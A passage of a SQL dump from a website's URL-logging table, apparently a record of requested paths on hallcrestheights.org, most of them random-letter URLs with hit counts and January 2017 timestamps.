00:00:00'),(2110,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k51340-lgeajanp-dmefnxh-qfhj-i20162637-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-06 18:29:28','0000-00-00 00:00:00'),(2111,'http://www.hallcrestheights.org/mrcq-gbeifuw-k31362-grabt-nwyrqs/i20162634-emgwkow-hmemxgku-cybnpzk-icvejxku-lzjc-jkntsxjl.htm',NULL,'','',1,0,'2017-01-06 18:30:05','0000-00-00 00:00:00'),(2112,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-k56820-korpv-i20162632-ubfgnq-tpmh-prbikzon-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-06 18:31:15','0000-00-00 00:00:00'),(2113,'http://www.hallcrestheights.org/nfrkopd-k35873-obbum-i20162630-golzes-rkwtzq/',NULL,'','',1,0,'2017-01-06 18:33:26','0000-00-00 00:00:00'),(2114,'http://www.hallcrestheights.org/i20162632-gnfznxvj-xpalt-itjshkyj-k25420-yldpija-amdu-rtaen-pggwtd.htm',NULL,'','',1,0,'2017-01-06 18:37:03','0000-00-00 00:00:00'),(2115,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-k39820-lbtr-hnnmt-i20162631-qzkowt.htm',NULL,'','',1,0,'2017-01-06 18:41:32','0000-00-00 00:00:00'),(2116,'http://www.hallcrestheights.org/uptt-mnbeatg-i20162630-k44282-rbnqc-dcncxr/dhcpgzz-dllimvyx-jltfeob-kebwivsm-qkrf-bmlkmsth-owgwhlkj-lbmrgir.htm',NULL,'','',1,0,'2017-01-06 18:41:40','0000-00-00 00:00:00'),(2117,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k5350-pzqjllzo/i20162635-hnjumnt-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-06 18:44:06','0000-00-00 00:00:00'),(2118,'http://www.hallcrestheights.org/jgle-tkymdrq-i20162634-znrvm-lkswaz-k32512-vkecqqn-eeiaqjzl-nplqfcn.htm',NULL,'','',1,0,'2017-01-06 18:45:12','0000-00-00 00:00:00'),(2119,'http://www.hallcrestheights.org/wbwpbon-k36773-kydhx-i20162630-jjikvf-vtzpxb/',NULL,'','',1,0,'2017-01-06 18:48:31','0000-00-00 00:00:00'),(2120,'http://www.hallcrestheights.org/k29905-bsoa-pazapst-asgmhcq-cmckf-i20162629-rdtfk/',NULL,'','',1,0,'2017-01-06 18:49:20','0000-00-00 00:00:00'),(2121,'http://www.hallcrestheights.org/vqjn-yspvhol-k44032-jpeur-rtpilu-ourxivl-i20162630-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-06 18:52:57','0000-00-00 00:00:00'),(2122,'http://www.hallcrestheights.org/zmku-k23332-edtzjiv-yoqxi-fgxuhx-ptvuhmi-i20162630-wnzkorpv-ubfgnqt.htm',NULL,'','',1,0,'2017-01-06 18:56:08','0000-00-00 00:00:00'),(2123,'http://www.hallcrestheights.org/k15450-mrcqgbei-fuwgr-abtnwyrq-semgwko/whme-i20162635-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',5,0,'2017-01-06 18:57:42','0000-00-00 00:00:00'),(2124,'http://www.hallcrestheights.org/company/press/2016/1605_tokkyo.html',NULL,'','',5,0,'2017-01-06 18:58:51','0000-00-00 00:00:00'),(2125,'http://www.hallcrestheights.org/joifa/formmail/koriyama_seminar.html',NULL,'','',6,0,'2017-01-06 19:00:20','0000-00-00 00:00:00'),(2126,'http://hallcrestheights.org/templates/hh2/prettyPhoto_compressed_3.1.5/js/\" + img_src + \"',NULL,'http://hallcrestheights.org/templates/hh2/prettyPhoto_compressed_3.1.5/js/jquery.prettyPhoto.js','',12,0,'2017-01-06 19:02:32','0000-00-00 00:00:00'),(2127,'http://www.hallcrestheights.org/joifa/formmail/saga_seminar.html',NULL,'','',6,0,'2017-01-06 19:03:09','0000-00-00 00:00:00'),(2128,'http://www.hallcrestheights.org/gnfz-nxvjxpa-ltitj-i20162628-shkyjy-ldpijaa-mdurtaen-k27292-pggwtdv.htm',NULL,'','',1,0,'2017-01-06 19:04:46','0000-00-00 00:00:00'),(2129,'http://www.hallcrestheights.org/i20162630-xhajvql-wczbi-qsosqx-k55473-oqkgqa-qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs/',NULL,'','',1,0,'2017-01-06 19:07:44','0000-00-00 00:00:00'),(2130,'http://www.hallcrestheights.org/ryvh-i20162633-rhmqtyy-sllge-ajanpd-mefnxhq-k53212-fhjdyhao-xrcjhwu.htm',NULL,'','',1,0,'2017-01-06 19:11:33','0000-00-00 00:00:00'),(2131,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-dqkunfgl-i20162635-qrhzyonx-k26850-feqnzs.htm',NULL,'','',1,0,'2017-01-06 19:11:40','0000-00-00 00:00:00'),(2132,'http://www.hallcrestheights.org/i20162636-fadlajfn-lgfpc/k36530-vwgmyhde-cwxbdeu.htm',NULL,'','',1,0,'2017-01-06 19:11:59','0000-00-00 00:00:00'),(2133,'http://www.hallcrestheights.org/vqjnyspv-holjp-k36830-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-i20162636-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-06 19:12:07','0000-00-00 00:00:00'),(2134,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc-i20162629-k5749-yzls/',NULL,'','',1,0,'2017-01-06 19:12:11','0000-00-00 00:00:00'),(2135,'http://www.hallcrestheights.org/fadl-ajfnlgf-i20162630-k11882-pcvwg-myhdec/wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu-hgfqvjdc-lbbvzgrc-mdfwbyb.htm',NULL,'','',1,0,'2017-01-06 19:12:18','0000-00-00 00:00:00'),(2136,'http://www.hallcrestheights.org/lugdltr-k52878-smxxhypz-qjllzohn-jumntec/wfogyw-biwyr-i20162632-urfgvfcw-qzhr-ibnkny-feeb-sbjh.htm',NULL,'','',1,0,'2017-01-06 19:13:34','0000-00-00 00:00:00'),(2137,'http://www.hallcrestheights.org/k10728-ryvhrhm-i20162633-qtyysllg-eajanpdm-efnxhqf-hjdyha-oxrcj-hwuvdsve-zytw.htm',NULL,'','',2,0,'2017-01-06 19:13:40','0000-00-00 00:00:00'),(2138,'http://www.hallcrestheights.org/zmkue-dtzj-k48864-ivyo-qxifgxuh-xptvuhmi-wnzkor-i20162632-pvubf-gnqtpm-hprbi-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-06 19:16:32','0000-00-00 00:00:00'),(2139,'http://www.hallcrestheights.org/pcsc-qrufunp-i20162634-kwxpo-k11812-ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-06 19:16:46','0000-00-00 00:00:00'),(2140,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz/agpec-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf-k35723-ipwgdqrk/',NULL,'','',1,0,'2017-01-06 19:16:57','0000-00-00 00:00:00'),(2141,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl/lzoh-njumnt-i20162637-ecwfog-k54126-ywbiw-yrurfgv.htm',NULL,'','',1,0,'2017-01-06 19:18:49','0000-00-00 00:00:00'),(2142,'http://www.hallcrestheights.org/k56850-vqjnyspv-holjp-eurrtpil-uourxiv/i20162634-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf.htm',NULL,'','',1,0,'2017-01-06 19:19:12','0000-00-00 00:00:00'),(2143,'http://www.hallcrestheights.org/k47992-dvis-ciwbvwk-uxkrb-i20162628-zomsmv-uclzuph-vqawuoxz-mnpzvsg.htm',NULL,'','',1,0,'2017-01-06 19:19:12','0000-00-00 00:00:00'),(2144,'http://www.hallcrestheights.org/jglet-kymd-i20162632-rqzn-rvmlkswa-k52584-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve.htm',NULL,'','',2,0,'2017-01-06 19:19:40','0000-00-00 00:00:00'),(2145,'http://www.hallcrestheights.org/k36864-dvisc-i20162633-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-06 19:20:34','0000-00-00 00:00:00'),(2146,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-k60789-glnik-ghhm-bbxpges-i20162632-mrcaizt-biauw-dtvixp-mtzh-zzwzrqrd/',NULL,'','',1,0,'2017-01-06 19:22:20','0000-00-00 00:00:00'),(2147,'http://www.hallcrestheights.org/k31612-dvis-ciwbvwk-i20162634-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg.htm',NULL,'','',1,0,'2017-01-06 19:23:48','0000-00-00 00:00:00'),(2148,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-terqb-i20162629-k3949-wnsw/',NULL,'','',1,0,'2017-01-06 19:26:45','0000-00-00 00:00:00'),(2149,'http://www.hallcrestheights.org/gnfz-nxvjxpa-i20162634-ltitj-shkyjy-ldpijaa-mdurtaen-k10912-pggwtdv.htm',NULL,'','',1,0,'2017-01-06 19:33:50','0000-00-00 00:00:00'),(2150,'http://www.hallcrestheights.org/link/index.html',NULL,'','',7,0,'2017-01-06 19:36:35','0000-00-00 00:00:00'),(2151,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-i20162633-ijimj-k18889-njbo/',NULL,'','',1,0,'2017-01-06 19:37:35','0000-00-00 00:00:00'),(2152,'http://www.hallcrestheights.org/zmkued-i20162637-tzjivy/k34226-oqxifg-xuhx.htm',NULL,'','',1,0,'2017-01-06 19:37:43','0000-00-00 00:00:00'),(2153,'http://www.hallcrestheights.org/i20162630-jgle-tkymdrq-k43432-znrvm-lkswaz-vkecqqn.htm',NULL,'','',1,0,'2017-01-06 19:38:58','0000-00-00 00:00:00'),(2154,'http://www.hallcrestheights.org/fadlajf-i20162633-nlgfpcvw-gmyhdecw-xbdeudk-ovfiib-k11128-ptquh-zxchhrmx.htm',NULL,'','',1,0,'2017-01-06 19:40:01','0000-00-00 00:00:00'),(2155,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-i20162631-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp-acayl-k7823-hyayzeue/',NULL,'','',1,0,'2017-01-06 19:42:13','0000-00-00 00:00:00'),(2156,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-i20162628-glnik-k48049-ghhm/',NULL,'','',1,0,'2017-01-06 19:43:30','0000-00-00 00:00:00'),(2157,'http://www.hallcrestheights.org/i20162635-k25450-dvisciwb-vwkux/krbzomsm-vuclzup-hvqa.htm',NULL,'','',2,0,'2017-01-06 19:43:41','0000-00-00 00:00:00'),(2158,'http://www.hallcrestheights.org/ixnmuea-i20162633-hwhiozhj-k11178-xbnwpgey/ooayiku-ksszqc-ebaqd-omytniho-lbde.htm',NULL,'','',1,0,'2017-01-06 19:43:55','0000-00-00 00:00:00'),(2159,'http://www.hallcrestheights.org/mrcq-i20162633-gbeifuw-k54112-grabt-nwyrqs-emgwkow-hmemxgku-cybnpzk.htm',NULL,'','',1,0,'2017-01-06 19:45:10','0000-00-00 00:00:00'),(2160,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii-bptqu-hzxchh-k5564-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-06 19:48:33','0000-00-00 00:00:00'),(2161,'http://www.hallcrestheights.org/i20162632-pcscq-rufu/k48914-npkw-xpoideot.htm',NULL,'','',1,0,'2017-01-06 19:48:35','0000-00-00 00:00:00'),(2162,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-i20162629-k26449-imjz/',NULL,'','',1,0,'2017-01-06 19:48:59','0000-00-00 00:00:00'),(2163,'http://www.hallcrestheights.org/vqjn-yspvhol/k11662-jpeur-rtpilu-i20162634-ourxivl.htm',NULL,'','',1,0,'2017-01-06 19:49:21','0000-00-00 00:00:00'),(2164,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-i20162633-qfcneb-k6564-xilnv-oxbdjve-ebikptj.htm',NULL,'','',1,0,'2017-01-06 19:50:19','0000-00-00 00:00:00'),(2165,'http://www.hallcrestheights.org/zmkuedtz-k8590-jivyo-qxifgxuh/i20162628-xptvuhm-iwnz-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-06 19:53:58','0000-00-00 00:00:00'),(2166,'http://www.hallcrestheights.org/vqjny-i20162633-spvh-oljp-eurrtpil-k7164-uourxivl-btrhnn-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-06 19:55:27','0000-00-00 00:00:00'),(2167,'http://www.hallcrestheights.org/bsoapaz-apsta-i20162630-sgmhcq-cmckfr-dtfkg-k35573-pvbc/',NULL,'','',1,0,'2017-01-06 19:55:47','0000-00-00 00:00:00'),(2168,'http://www.hallcrestheights.org/i20162632-vqjnysp-vholjpeu-rrtpiluo-urxivlb-k53028-trhnnm-tqzko-wtsxppbg-rrcd.htm',NULL,'','',2,0,'2017-01-06 19:55:55','0000-00-00 00:00:00'),(2169,'http://www.hallcrestheights.org/k6264-ixnmu-i20162633-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-06 19:56:22','0000-00-00 00:00:00'),(2170,'http://www.hallcrestheights.org/ajqxx-ucuzao-k54457-fifep-hiij-i20162634-imjnjbo/',NULL,'','',1,0,'2017-01-06 19:56:47','0000-00-00 00:00:00'),(2171,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum/k35523-zbsaii-mjzfo-zgdv-i20162630-ddqjvd-obknly/',NULL,'','',1,0,'2017-01-06 19:57:13','0000-00-00 00:00:00'),(2172,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx-jjikvf-k24423-vtzpxb/xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-06 19:59:35','0000-00-00 00:00:00'),(2173,'http://www.hallcrestheights.org/zmkued-tzjivy-i20162634-oqxifg-xuhx-k51516-ptvuhm-iwnzko-rpvub-fgnqtpm.htm',NULL,'','',1,0,'2017-01-06 20:00:16','0000-00-00 00:00:00'),(2174,'http://www.hallcrestheights.org/qlbowc-iggeceay-i20162632-afxr-glnik-k38689-ghhm/',NULL,'','',1,0,'2017-01-06 20:04:46','0000-00-00 00:00:00'),(2175,'http://www.hallcrestheights.org/k10584-edzvd-i20162633-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-06 20:08:17','0000-00-00 00:00:00'),(2176,'http://www.hallcrestheights.org/yembj-vhtqqd-k53557-ckzfl-tzte-i20162634-rqbwnsw/',NULL,'','',1,0,'2017-01-06 20:12:08','0000-00-00 00:00:00'),(2177,'http://www.hallcrestheights.org/i20162630-kzpffms-xklrd-edhwge-k56653-fvbbgz-agpec/',NULL,'','',1,0,'2017-01-06 20:12:21','0000-00-00 00:00:00'),(2178,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-k31584-pzqjllzo-hnjumnte-cwfogy-i20162632-wbiwy-rurfgv-fcwqz-hribnkn-yfeebsb.htm',NULL,'','',1,0,'2017-01-06 20:14:26','0000-00-00 00:00:00'),(2179,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-i20162636-k52884-cwxbdeud-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-06 20:15:32','0000-00-00 00:00:00'),(2180,'http://www.hallcrestheights.org/i20162634-ixnmueah-whioz/k58550-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',1,0,'2017-01-06 20:15:42','0000-00-00 00:00:00'),(2181,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm/ckfrdtf-kgpvbchs-k52707-iwhorklv-zrtjrsy-i20162634-oaayfwgd-xskmy-ukcm/',NULL,'','',1,0,'2017-01-06 20:16:50','0000-00-00 00:00:00'),(2182,'http://www.hallcrestheights.org/zmkued-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-k33576-rpvub-i20162637-fgnqtpm-hprbikz-onmtla.htm',NULL,'','',1,0,'2017-01-06 20:17:50','0000-00-00 00:00:00'),(2183,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-i20162631-uhvfcy-zlsxx-k7673-qrox/',NULL,'','',1,0,'2017-01-06 20:19:01','0000-00-00 00:00:00'),(2184,'http://www.hallcrestheights.org/edzvd-i20162633-lqco-mnnm-mcawvbfu-k26964-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-06 20:19:16','0000-00-00 00:00:00'),(2185,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-k27264-aoxrc-i20162633-jhwuvd-svezy-twlcycw-scpuakq.htm',NULL,'','',1,0,'2017-01-06 20:21:40','0000-00-00 00:00:00'),(2186,'http://www.hallcrestheights.org/yembjv-i20162629-k25399-htqqdckz-fltz-terqb/wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev/',NULL,'','',1,0,'2017-01-06 20:22:52','0000-00-00 00:00:00'),(2187,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh/i20162630-njumnte-cwfogywb-iwyrurf-gvfcwqzh-k54282-ribn-knyfeebs-bjhfkwet.htm',NULL,'','',1,0,'2017-01-06 20:23:08','0000-00-00 00:00:00'),(2188,'http://www.hallcrestheights.org/gnfzn-i20162633-xvjx-palt-itjshkyj-k11484-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-06 20:23:10','0000-00-00 00:00:00'),(2189,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu/japyvrl-i20162636-flxh-qjkuh-k15030-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-06 20:23:46','0000-00-00 00:00:00'),(2190,'http://www.hallcrestheights.org/k56950-zmkuedtz-jivyo/qxifgxuh-xptvuhm-i20162634-iwnz.htm',NULL,'','',1,0,'2017-01-06 20:24:46','0000-00-00 00:00:00'),(2191,'http://www.hallcrestheights.org/i20162628-dvisciwb-k8290-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-01-06 20:26:08','0000-00-00 00:00:00'),(2192,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-i20162628-qxdos-k47149-fiet/',NULL,'','',1,0,'2017-01-06 20:26:45','0000-00-00 00:00:00'),(2193,'http://www.hallcrestheights.org/k16080-jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-i20162636-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-06 20:27:01','0000-00-00 00:00:00'),(2194,'http://www.hallcrestheights.org/gnfzn-k48664-xvjx-palt-itjshkyj-i20162632-yldpijaa-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',2,0,'2017-01-06 20:28:09','0000-00-00 00:00:00'),(2195,'http://www.hallcrestheights.org/wbwpb-k31807-onkydh-xjjik-vfvt/zpxbxkc-wjybtylw-i20162634-osduieqg-wsogxhg-pisdhtni/',NULL,'','',1,0,'2017-01-06 20:30:41','0000-00-00 00:00:00'),(2196,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc/yzls-xxqroxa-ehkskxy-xembu-qudtwq-i20162629-k25899-ceyv/',NULL,'','',1,0,'2017-01-06 20:31:07','0000-00-00 00:00:00'),(2197,'http://www.hallcrestheights.org/i20162632-mrcqg-beif-uwgr-abtnwyrq-k31284-semgwkow-hmemxg-kucyb-npzkic.htm',NULL,'','',1,0,'2017-01-06 20:32:32','0000-00-00 00:00:00'),(2198,'http://www.hallcrestheights.org/k28690-jgletkym-drqzn/rvmlkswa-i20162628-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-06 20:32:40','0000-00-00 00:00:00'),(2199,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb/qxdosf-ietyu-i20162630-k34123-aixn-rbdggs/',NULL,'','',1,0,'2017-01-06 20:32:46','0000-00-00 00:00:00'),(2200,'http://www.hallcrestheights.org/i20162632-dvisc-iwbv-wkux-krbzomsm-k48564-vuclzuph-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-06 20:34:20','0000-00-00 00:00:00'),(2201,'http://www.hallcrestheights.org/yembjv-htqqdckz-fltz-i20162633-terqb-k17989-wnsw/',NULL,'','',1,0,'2017-01-06 20:42:27','0000-00-00 00:00:00'),(2202,'http://www.hallcrestheights.org/htxwhyk-i20162631-rsvsv/hudykb-k7603-qxdosf-ietyu/',NULL,'','',1,0,'2017-01-06 20:43:08','0000-00-00 00:00:00'),(2203,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-ijimjn/i20162630-jbogt-sakb-ccgyfm-k57603-dvjuxz-lektsls-hxosq-qjvfy/',NULL,'','',1,0,'2017-01-06 20:44:12','0000-00-00 00:00:00'),(2204,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-k11484-yldpijaa-i20162637-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-06 20:45:43','0000-00-00 00:00:00'),(2205,'http://www.hallcrestheights.org/i20162630-soegszx-yifet-vtndyu-k56553-uhvfcy-zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu/',NULL,'','',1,0,'2017-01-06 20:46:34','0000-00-00 00:00:00'),(2206,'http://www.hallcrestheights.org/k10584-edzvd-lqco-mnnm-mcawvbfu-japyvrlf-i20162637-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-06 20:49:31','0000-00-00 00:00:00'),(2207,'http://hallcrestheights.org/x.htm',NULL,'','',5,0,'2017-01-06 20:51:47','0000-00-00 00:00:00'),(2208,'http://www.hallcrestheights.org/i20162635-xhajv-qlwczb-k12157-iqsos-qxoq-kgqaqyd/',NULL,'','',1,0,'2017-01-06 20:52:14','0000-00-00 00:00:00'),(2209,'http://www.hallcrestheights.org/ixnmue-ahwhio-zhjxbn-wpge-k33876-yooayi-i20162637-kukssz-qceba-qdomytn.htm',NULL,'','',1,0,'2017-01-06 20:54:10','0000-00-00 00:00:00'),(2210,'http://www.hallcrestheights.org/bsoapa-zapstasg-i20162632-mhcq-cmckf-k59389-rdtf/',NULL,'','',1,0,'2017-01-06 21:06:43','0000-00-00 00:00:00'),(2211,'http://www.hallcrestheights.org/company/press/2016/1606_home.html',NULL,'','',6,0,'2017-01-06 21:07:20','0000-00-00 00:00:00'),(2212,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-i20162636-k42804-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-06 21:07:57','0000-00-00 00:00:00'),(2213,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_2016.html',NULL,'','',5,0,'2017-01-06 21:08:14','0000-00-00 00:00:00'),(2214,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-i20162635-dmefnxh-k37300-qfhj-dyhao-xrcjhw.htm',NULL,'','',4,0,'2017-01-06 21:08:37','0000-00-00 00:00:00'),(2215,'http://www.hallcrestheights.org/k12384-pcscq-i20162633-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-06 21:08:44','0000-00-00 00:00:00'),(2216,'http://www.hallcrestheights.org/i20162635-k15550-edzvdlqc-omnnm/mcawvbfu-japyvrl-flxh.htm',NULL,'','',6,0,'2017-01-06 21:13:51','0000-00-00 00:00:00'),(2217,'http://www.hallcrestheights.org/k58300-pcscqruf-unpkw-xpoideot-wtvsoar-i20162634-mosm.htm',NULL,'','',3,0,'2017-01-06 21:17:18','0000-00-00 00:00:00'),(2218,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-k57900-ytni-i20162634-holbdent-afymluze-xtlfgg.htm',NULL,'','',3,0,'2017-01-06 21:17:28','0000-00-00 00:00:00'),(2219,'http://www.hallcrestheights.org/joifa/formmail/matsumoto_seminar.html',NULL,'','',5,0,'2017-01-06 21:17:30','0000-00-00 00:00:00'),(2220,'http://www.hallcrestheights.org/i20162632-lugdltrs-mxxhy-pzqjllzo-hnjumnt-k5220-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-06 21:17:37','0000-00-00 00:00:00'),(2221,'http://www.hallcrestheights.org/soegs-zxyife-k31957-tvtnd-yuuh-i20162634-vfcyzls/',NULL,'','',1,0,'2017-01-06 21:17:44','0000-00-00 00:00:00'),(2222,'http://www.hallcrestheights.org/kzpffms-k7903-xklrd-edhwge-i20162631-fvbbgz/agpec-iyyu-wuvfzt-jigjin-amzbcng/',NULL,'','',1,0,'2017-01-06 21:18:33','0000-00-00 00:00:00'),(2223,'http://www.hallcrestheights.org/qlbowci-ggece-ayafxr-i20162631-glnikg-hhmbb-k7853-xpge/',NULL,'','',1,0,'2017-01-06 21:19:08','0000-00-00 00:00:00'),(2224,'http://www.hallcrestheights.org/oiyizgo-k7353-lrcmw-fbsnop-dgfnhs-krljr-gfct-fzfiwx-i20162631-wmakoa/',NULL,'','',1,0,'2017-01-06 21:19:42','0000-00-00 00:00:00'),(2225,'http://www.hallcrestheights.org/k51984-zmkue-dtzj-ivyo-qxifgxuh-i20162636-xptvuhmi-wnzkor-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-06 21:19:46','0000-00-00 00:00:00'),(2226,'http://www.hallcrestheights.org/soegszx-i20162631-yifet-vtndyu-k7153-uhvfcy-zlsxx/',NULL,'','',1,0,'2017-01-06 21:20:13','0000-00-00 00:00:00'),(2227,'http://www.hallcrestheights.org/ixnm-ueahwhi-k362-ozhjx-bnwpge/yooayik-uksszqce-i20162634-baqdomy-tniholbd-enta-fymluzex-tlfggcsd-imrmqfn.htm',NULL,'','',1,0,'2017-01-06 21:22:14','0000-00-00 00:00:00'),(2228,'http://www.hallcrestheights.org/dvisc-k16714-iwbv-wkux-krbzomsm/vuclzuph-i20162633-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',1,0,'2017-01-06 21:23:11','0000-00-00 00:00:00'),(2229,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-i20162628-k9540-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-06 21:23:32','0000-00-00 00:00:00'),(2230,'http://www.hallcrestheights.org/nfrko-pdobbu-k32857-mgolz-esrk-i20162634-wtzqtqb/',NULL,'','',2,0,'2017-01-06 21:27:25','0000-00-00 00:00:00'),(2231,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv-i20162635-bfuj-k10116-apyvrl-flxhqj-kuhkc-mumbhmg.htm',NULL,'','',1,0,'2017-01-06 21:34:56','0000-00-00 00:00:00'),(2232,'http://www.hallcrestheights.org/tkuykfj-k55423-dnjjb-i20162630-ucyupa-jaylrl/wfvdy-ruqp-klsdef-hxdfpd-fufpfaj/',NULL,'','',1,0,'2017-01-06 21:36:49','0000-00-00 00:00:00'),(2233,'http://www.hallcrestheights.org/gnfzn-xvjx/palt-i20162633-itjshkyj-k27214-yldpijaa.htm',NULL,'','',1,0,'2017-01-06 21:37:59','0000-00-00 00:00:00'),(2234,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq-cmckfr-k7753-dtfkg-pvbc-i20162631-hsiwho/',NULL,'','',1,0,'2017-01-06 21:39:07','0000-00-00 00:00:00'),(2235,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt-zpxbxkc-k11657-wjybtylw-osduieqg-i20162635-wsogxhg-pisdhtni-rmjhv-zyxo-dbxant/',NULL,'','',1,0,'2017-01-06 21:40:16','0000-00-00 00:00:00'),(2236,'http://www.hallcrestheights.org/jglet-kymd/i20162632-rqzn-rvmlkswa-k48814-zvkecqqn.htm',NULL,'','',1,0,'2017-01-06 21:41:33','0000-00-00 00:00:00'),(2237,'http://www.hallcrestheights.org/k22104-upttm-nbea-tgrb-nqcdcncx-i20162636-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-06 21:43:55','0000-00-00 00:00:00'),(2238,'http://www.hallcrestheights.org/i20162630-ryvh-rhmqtyy-k43332-sllge-ajanpd-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak.htm',NULL,'','',1,0,'2017-01-06 21:43:56','0000-00-00 00:00:00'),(2239,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor-pvubf-gnqtpm-k11684-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-01-06 21:44:19','0000-00-00 00:00:00'),(2240,'http://www.hallcrestheights.org/k50290-mrcqgbei-fuwgr/i20162637-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-06 21:47:16','0000-00-00 00:00:00'),(2241,'http://www.hallcrestheights.org/vqjn-yspvhol/i20162630-k12182-jpeur-rtpilu-ourxivl-btrhnnmt.htm',NULL,'','',1,0,'2017-01-06 21:47:21','0000-00-00 00:00:00'),(2242,'http://www.hallcrestheights.org/bsoapa-i20162636-zapstasg-mhcq-cmckf-k10249-rdtf/',NULL,'','',3,0,'2017-01-06 21:47:27','0000-00-00 